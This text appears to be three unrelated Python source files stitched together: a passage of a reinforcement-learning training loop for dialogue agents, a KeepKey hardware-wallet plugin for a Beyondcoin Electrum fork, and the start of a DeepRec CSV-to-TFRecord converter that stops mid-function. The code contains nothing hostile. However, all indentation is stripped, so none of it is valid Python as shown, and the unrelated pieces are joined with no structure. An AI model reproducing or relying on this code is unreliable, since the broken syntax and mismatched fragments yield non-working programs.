print('[run{}/{}]\t num:{} \t time:{:.2f}s.'.format(i+1, args.epochs, total_num, time.time()-cur_t))
continue
draw_info(train_loss, train_accu, train_step_info, 'train', i)
# print('[DEBUG] {} time {}s.'.format('train', time.time()-cur_t))
# cur_t = time.time()
# info = worker.send(
# ['train_tom', pkl.dumps((train_agent, train_batch,
# train_strategy, 'cache/{}/train_pred_{}.pkl'.format(args.name, i)))])
# train_loss, train_step_info = pkl.loads(info[1])
# info = worker.send(
# ['valid_tom', pkl.dumps((train_agent, dev_batch,
# dev_strategy, 'cache/{}/dev_pred_{}.pkl'.format(args.name, i)))])
# dev_loss, dev_step_info = pkl.loads(info[1])
if args.tom_model != 'id' and split_results:
# divide by 2 different id
dev_loss = [0]*3
dev_accu = [0]*2
for j in range(2):
ratio = len(dev_strategy[j]) / (len(dev_strategy[0]) + len(dev_strategy[1]))
info = worker.local_send(
['valid_tom', (train_agent, dev_batch_splited[j],
dev_strategy[j], update_table, ret_table,
'cache/{}/dev{}_pred_{}.pkl'.format(args.name, j, i))])
tmp_loss, tmp_accu, dev_step_info = info[1]
for x in range(3):
if isinstance(tmp_loss[x], float):
dev_loss[x] += ratio * tmp_loss[x]
else:
if tmp_loss[x] != [] and tmp_loss[x] is not None:
print(tmp_loss[x])
dev_loss[x] = None
for x in range(2):
if isinstance(tmp_accu[x], float):
dev_accu[x] += ratio * tmp_accu[x]
else:
if tmp_accu[x] != [] and tmp_accu[x] is not None:
print(tmp_accu[x])
dev_accu[x] = None
draw_dev_info(tmp_loss, tmp_accu, dev_step_info, 'dev', dev_writer[j], i)
draw_dev_info(dev_loss, dev_accu, None, 'dev', self.writer, i)
else:
info = worker.local_send(
['valid_tom', (train_agent, dev_batch_splited,
dev_strategy, update_table, ret_table,
'cache/{}/dev_pred_{}.pkl'.format(args.name, i))])
dev_loss, dev_accu, dev_step_info = info[1]
# draw_info(dev_loss, dev_accu, dev_step_info, 'dev', i)
# draw_dev_info(dev_loss, dev_accu, None, 'dev', self.writer, i)
draw_info(dev_loss, dev_accu, dev_step_info, 'dev', i)
# print('[DEBUG] {} time {}s.'.format('valid', time.time() - cur_t))
# cur_t = time.time()
if i == 0:
print('train_step_info:', train_step_info[2])
# print('dev_step_info:', dev_step_info[2])
print('[train{}/{}]\t time:{:.2f}s.'.format(i+1, args.epochs, time.time()-cur_t))
cur_t = time.time()
if update_table['id']:
print('\t<identity> train loss{:.5f} accu{:.5f}, valid loss{:.5f} accu{:.5f}, '
.format(train_loss[0], train_accu[0], dev_loss[0], dev_accu[0]))
if update_table['tom']:
print('\t<tom> train ploss{:.5f} accu{:.5f}, valid ploss{:.5f} accu{:.5f}, '.
format(train_loss[2], train_accu[1], dev_loss[2], dev_accu[1]))
# print('\t<tom> train_loss:{:.5f}, valid_loss:{:.5f}, ')
# print('[info] train{}/{} train_loss:{:.5f}, valid_loss:{:.5f}, time:{:.2f}s.'
# .format(i+1, args.epochs, train_loss, dev_loss, time.time()-cur_t))
# print('[DEBUG] {} time {}s.'.format('tfboard', time.time() - cur_t))
# cur_t = time.time()
# Save models
if not update_table['tom']:
# When only update id
score = dev_accu[0]
score_type = 'accu'
else:
score = dev_loss[2]
score_type = 'loss'
if (i+1)%30 == 0:
# Only update best model
worker.local_send(['save_best_model', (i, score, score_type, True)])
# print('[DEBUG] {} time {}s.'.format('dump_model', time.time() - cur_t))
# cur_t = time.time()
elif (i+1)%100 == 0:
worker.local_send(['save_best_model', (i, score, score_type, False)])
# print('[DEBUG] {} time {}s.'.format('dump_model', time.time() - cur_t))
# cur_t = time.time()
def _log_policy(self, examples, dump_result):
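# Average the intent policy (i_policy) and, when present, the price policy
# (p_policy) over all events of each agent, accumulate the per-epoch means,
# and optionally dump the running average to the per-agent policy log files.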
policies = [{
'i_policy': [], 'p_policy': []
}, {
'i_policy': [], 'p_policy': []
}]
for ex in examples:
for e in ex.events:
i = e.agent
odata = e.metadata['output_data']
policies[i]['i_policy'].append(odata['policy'].reshape(1, -1))
if odata.get('p_policy') is not None:
policies[i]['p_policy'].append(odata['p_policy'].reshape(1, -1))
for i in range(2):
for k in policies[i]:
if len(policies[i][k]) > 0:
policies[i][k] = torch.cat(policies[i][k], dim=0).mean(dim=0, keepdim=True)
if self.policies_log[i].get(k) is None:
self.policies_log[i][k] = []
self.policies_log[i][k].append(policies[i][k])
if dump_result:
logger = logging.getLogger('agent{}_plog_{}'.format(i, k))
tmp = torch.cat(self.policies_log[i][k], dim=0).mean(dim=0)
# tensor([x, x, x])
logger.info(str(tmp.data)[8:-2].replace(" ", "").replace("\n", ""))
def _init_policy_logfiles(self, logdir):
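# Set up one plain-text file logger per (agent, policy type) pair so that
# _log_policy can write its averaged policies to separate files under logdir.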
formatter = logging.Formatter('%(message)s')
# stream_handler = logging.StreamHandler()
# stream_handler.setLevel(logging.DEBUG)
# stream_handler.setFormatter(formatter)
# logger.addHandler(stream_handler)
for i in range(2):
for name in ['i_policy', 'p_policy']:
file_handler = logging.FileHandler(os.path.join(logdir, 'agent{}_plog_{}.log'.format(i, name)))
file_handler.setLevel(level=logging.INFO)
file_handler.setFormatter(formatter)
logger = logging.getLogger('agent{}_plog_{}'.format(i, name))
logger.setLevel(level=logging.INFO)
logger.addHandler(file_handler)
def learn(self):
args = self.args
rewards = [None] * 2
s_rewards = [None] * 2
critic_report_stats = RLStatistics()
critic_stats = RLStatistics()
last_time = time.time()
tensorboard_every = 1
save_every = 100
history_train_losses = [[], []]
batch_size = 50
pretrain_rounds = 3
if args.only_run:
batch_size = 1
pretrain_rounds = 0
save_every = max(1, save_every // batch_size)
report_every = max(1, args.report_every // batch_size)
num_worker = self.update_worker_list()
worker = self.worker_conn[0]
max_epoch = args.num_dialogues // batch_size
max_epoch = args.epochs
batch_size = args.batch_size
save_every = max(50, max_epoch // 100)
report_every = max(1, max_epoch // 100)
if args.debug:
save_every = 1
device = 'cpu'
if len(args.gpuid) > 0:
device = "cuda:{}".format(args.gpuid[0])
policy_buffer = ReplayBuffer.get_instance('policy')
value_buffer = ReplayBuffer.get_instance('value')
self._init_policy_logfiles('logs/' + args.name)
sample_size = 32
train_size = 128
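# policy_buffer is emptied at the start of every epoch (on-policy updates),
# while value_buffer keeps accumulating trajectories and is replayed below
# for the additional value-function updates.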
for epoch in range(max_epoch):
last_time = time.time()
policy_buffer.empty()
# _batch_iters, _rewards, example, _ = self.sample_data(i, batch_size, args)
# print('=' * 5 + ' [Epoch {}/{} running.]'.format(epoch, max_epoch))
tt = time.time()
info = worker.send(['simulate', epoch, sample_size, sample_size])
_batch_iters, batch_info, example, v_str = pkl.loads(info[1])
_rewards, strategies = batch_info
self._log_policy(example, (epoch+1) % save_every == 0)
policy_buffer.add_batch_iters(_batch_iters[0],
add_dict={'reward': _rewards[0], 'strategy': strategies[0]})
value_buffer.add_batch_iters(_batch_iters[0],
add_dict={'reward': _rewards[0], 'strategy': strategies[0]})
# For debug
# print("rewards:", np.mean(_rewards[0]), np.mean(_rewards[1]))
# print("rewards_num:", len(_rewards[0]), len(_rewards[1]))
tt = time.time()
value_update = min(value_buffer.size//train_size, 5)
for i in range(value_update):
batch_iters, _, ret_add = value_buffer.sample_batch(train_size, add_info={'reward'}, to_device=device)
worker.local_send(
['train', (epoch, batch_iters, ret_add['reward'], 'fix_policy')])
batch_iters, _, ret_add = policy_buffer.sample_batch(train_size, add_info={'reward'}, to_device=device)
info = worker.local_send(
['train', (epoch, batch_iters, ret_add['reward'], '')])
loss = info[1]
print('train time:', time.time()-tt)
# Draw outputs on the tensorboard
self._draw_tensorboard((epoch + 1) , [[loss], []],
_rewards)
print('\t<train> reward{:.3f}, {:.3f} pg_loss {:.5f}, value_loss {:.5f}, value_update {}'
.format(np.mean(_rewards[0]), np.mean(_rewards[1]), loss['pg_loss'][0,0], loss['value_loss'][0,0], value_update))
if (epoch+1)%save_every == 0:
self._dump_buffer(value_buffer, epoch+1)
self.dump_examples(example, v_str, epoch, 'train')
valid_info = worker.local_send(['valid', (0, 200)])
valid_stats, example, v_str = valid_info[1]
self.dump_examples(example, v_str, epoch, 'dev')
valid_reward = [vs.mean_reward() for vs in valid_stats]
self._draw_tensorboard_valid((epoch + 1), valid_reward)
print('\t<valid> reward{:.3f}, {:.3f}'.format(valid_reward[0], valid_reward[1]))
worker.local_send(['save_model', (epoch, valid_reward[0], 'reward')])
print('=' * 5 + ' [Epoch {}/{} for {:.3f}s.]'.format(epoch+1, max_epoch, time.time() - last_time))
# # Save model
# if (i + 1) % save_every == 0:
# # TODO: valid in dev set
# valid_stats, _, _ = self.validate(args, 50 if args.only_run else 200)
# if not args.only_run:
# self.drop_checkpoint(args, i + 1, valid_stats,
# model_opt=self.agents[self.training_agent].env.model_args)
# if args.update_oppo:
# self.update_opponent(['policy', 'critic'])
# else:
# print('valid ', valid_stats.str_loss())
def _dump_buffer(self, buffer, epoch, ):
args = self.args
path_pkl = '{root}/{model}_buffer{epoch}.pkl'.format(
root=args.model_path,
model=args.name,
epoch=epoch)
print('Save buffer at {}.'.format(path_pkl))
with open(path_pkl, 'wb') as f:
pkl.dump(buffer, f)
# with open(path_pkl, 'rb') as f:
# bf = pkl.load(f)
def run(self):
# deprecated
# self.run_local_workers()
args = self.args
rewards = [None] * 2
s_rewards = [None] * 2
tensorboard_every = 1
save_every = 50
history_train_losses = [[], []]
batch_size = 100
pretrain_rounds = 3
save_every = max(1, save_every // batch_size)
report_every = max(1, args.report_every // batch_size)
max_epoch = args.num_dialogues // batch_size
epoch = 0
data_size = 0
all_rewards = [[], []]
num_worker = self.update_worker_list()
last_time = time.time()
for epoch in range(args.start_epoch, max_epoch):
batches = []
rewards = [[], []]
task_lists = self.allocate_tasks(num_worker, batch_size)
# Use workers to get trajectories
train_examples = []
train_ex_str = []
for i, w in enumerate(self.worker_conn):
info = w.send(['simulate', epoch, batch_size, task_lists[i]])
if info[0] != 'done':
print('Error on {}: {}.'.format(i, info))
data = pkl.loads(info[1])
batches += data[0]
rewards[0] += data[1][0]
rewards[1] += data[1][1]
train_examples += data[2]
train_ex_str += data[3]
self.dump_examples(train_examples, train_ex_str, epoch)
# For debug
print("rewards:", np.mean(rewards[0]), np.mean(rewards[1]))
print("rewards_num:", len(rewards[0]), len(rewards[1]))
# Train the model
train_info = self.worker_conn[0].send(['train', pkl.dumps((epoch, batches, rewards[0], self.args.train_mode))])
if train_info[0] != 'done':
print('Error on worker 0: {}.'.format(train_info))
# Draw outputs on the tensorboard
self._draw_tensorboard((epoch + 1) * batch_size, [[pkl.loads(train_info[1])], []],
rewards)
# Get new model from trainer
info = self.worker_conn[0].send(['fetch_model', 0])
data = info[1]
# Save local checkpoint
# Update all the worker
for i, w in enumerate(self.worker_conn):
if i == 0:
continue
w.send(['update_model', 0, data])
# for i, w in enumerate(self.worker_conn):
# if i == 0:
# continue
# w.recv()
# Valid new model
task_lists = self.allocate_tasks(num_worker, 50)
now = 0
valid_stats = [RLStatistics(), RLStatistics()]
valid_examples = []
valid_ex_str = []
for i, w in enumerate(self.worker_conn):
valid_info = w.send(['valid', (now, task_lists[i])])
now += task_lists[i]
valid_info[1] = pkl.loads(valid_info[1])
for j in range(2):
valid_stats[j].update(valid_info[1][0][j])
valid_examples += valid_info[1][1]
valid_ex_str += valid_info[1][2]
self.dump_examples(valid_examples, valid_ex_str, epoch, 'dev')
# Save the model
self.worker_conn[0].send(['save_model', pkl.dumps((epoch, valid_stats[0]))])
# self.worker_conn[0].recv()
# Draw dev rewards on tensorboard
dev_rewards = [valid_stats[j].mean_reward() for j in range(2)]
self._draw_tensorboard_valid((epoch + 1) * batch_size, dev_rewards)
print('=' * 5 + ' [Epoch {} for {:.3f}s.]'.format(epoch, time.time() - last_time))
last_time = time.time()
self.quit_all_workers()
self.join_local_workers()
def quit_all_workers(self):
for w in self.worker_conn:
w.send(['quit'])
def join_local_workers(self):
# for w in self.local_workers:
# w.join()
pass
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_bynd.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_bynd.bip32 import BIP32Node
from electrum_bynd import constants
from electrum_bynd.i18n import _
from electrum_bynd.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_bynd.keystore import Hardware_KeyStore
from electrum_bynd.plugin import Device
from electrum_bynd.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
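# Pick the transport by USB product id: product id 2 is treated as a
# WebUSB device, everything else goes through the HID transport.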
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Beyondcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
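# Build TxInputType/TxOutputType messages for the device, let it sign, then
# append the SIGHASH_ALL byte (0x01) to each returned DER signature before
# writing the signatures back into the transaction.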
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
converter.py
|
# -*- coding:utf-8 -*-
# Copyright 2019 The DeepRec Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import multiprocessing
import sys
import time
from datetime import datetime
from multiprocessing import Process, Queue
import pandas as pd
import tensorflow as tf
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(pathname)s:%(lineno)d - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
class CSV2TFRecord(object):
def __init__(self, LABEL, NUMERICAL_FEATURES, CATEGORY_FEATURES, VARIABLE_FEATURES, gzip=False):
self.LABEL = LABEL
self.NUMERICAL_FEATURES = NUMERICAL_FEATURES
self.CATEGORY_FEATURES = CATEGORY_FEATURES
self.VARIABLE_FEATURES = VARIABLE_FEATURES
self.gzip = gzip
self.in_queue = Queue()
self.out_queue = Queue()
def __call__(self, dataframe, out_file, prebatch=1, *args, **kwargs):
"""
Transforms tabular data in pandas.DataFrame format to tf.Example protos and dumps them to a TFRecord file.
The benefit of doing this is to use existing training and evaluating functionality within tf
packages.
:param dataframe: input pd.DataFrame data
:param out_file: output TFRecord file path
:param prebatch: number of DataFrame rows packed into each serialized tf.Example
:param args:
:param kwargs:
:return:
"""
def parsing_loop():
"""
Function executed in each parsing process: reads pandas.DataFrame slices
from self.in_queue, converts them into tf.Example protos, and puts the
serialized protos on self.out_queue. A plain string sentinel ("DONE")
tells the process to stop.
"""
while True: # loop.
raw_record = self.in_queue.get() # read from in_queue.
# logging.debug('parsing_loop raw_example:{}'.format(raw_record))
if isinstance(raw_record, str):
# We were done here.
break
features = {} # dict for all feature columns and target column.
for item in raw_record.columns:
tmp = list(raw_record[item].values)
if item in self.CATEGORY_FEATURES:
features[item] = self._int64_feature(tmp)
elif item in self.VARIABLE_FEATURES:
features[item] = self._int64_feature(tmp[0])
elif item in self.NUMERICAL_FEATURES:
features[item] = self._float_feature(tmp)
elif item in self.LABEL:
features[item] = self._int64_feature(tmp)
# create an instance of tf.Example.
example = tf.train.Example(features=tf.train.Features(feature=features))
# serialize the tf.Example to string.
raw_example = example.SerializeToString()
# write the serialized tf.Example out.
self.out_queue.put(raw_example)
def writing_loop():
"""
Function executed in the single writing process: reads serialized
tf.Example strings from self.out_queue and writes them to the output
TFRecord file (optionally GZIP-compressed). A plain string sentinel
("DONE") closes the writer and ends the loop.
"""
options = tf.io.TFRecordOptions(compression_type='GZIP')
writer = tf.io.TFRecordWriter(out_file, options=options if self.gzip else None) # writer for the output TFRecord file.
sample_count = 0
while True:
raw_example = self.out_queue.get() # read from out_queue.
logging.debug('writing_loop raw_example:{}'.format(raw_example))
if isinstance(raw_example, str):
break
writer.write(raw_example) # write it out.
sample_count += 1
if not sample_count % 1000:
logging.info('%s Processed %d examples' % (datetime.now(), sample_count * prebatch))
sys.stdout.flush()
writer.close() # close the writer.
logging.info('%s >>>> Processed %d examples <<<<' % (datetime.now(), sample_count * prebatch))
self.sample_cnt = sample_count
sys.stdout.flush()
start_time = time.time()
# start parsing processes.
num_parsers = int(multiprocessing.cpu_count() - 1)
parsers = []
for i in range(num_parsers):
p = Process(target=parsing_loop)
parsers.append(p)
p.start()
# start writing process.
writer = Process(target=writing_loop)
writer.start()
# logging.info('%s >>>> BEGIN to feed input file %s <<<<' % (datetime.now(), self.path))
for i in range(0, len(dataframe), prebatch):
line = dataframe[i:i + prebatch]
if len(line) < prebatch:
continue
self.in_queue.put(line) # write to in_queue.
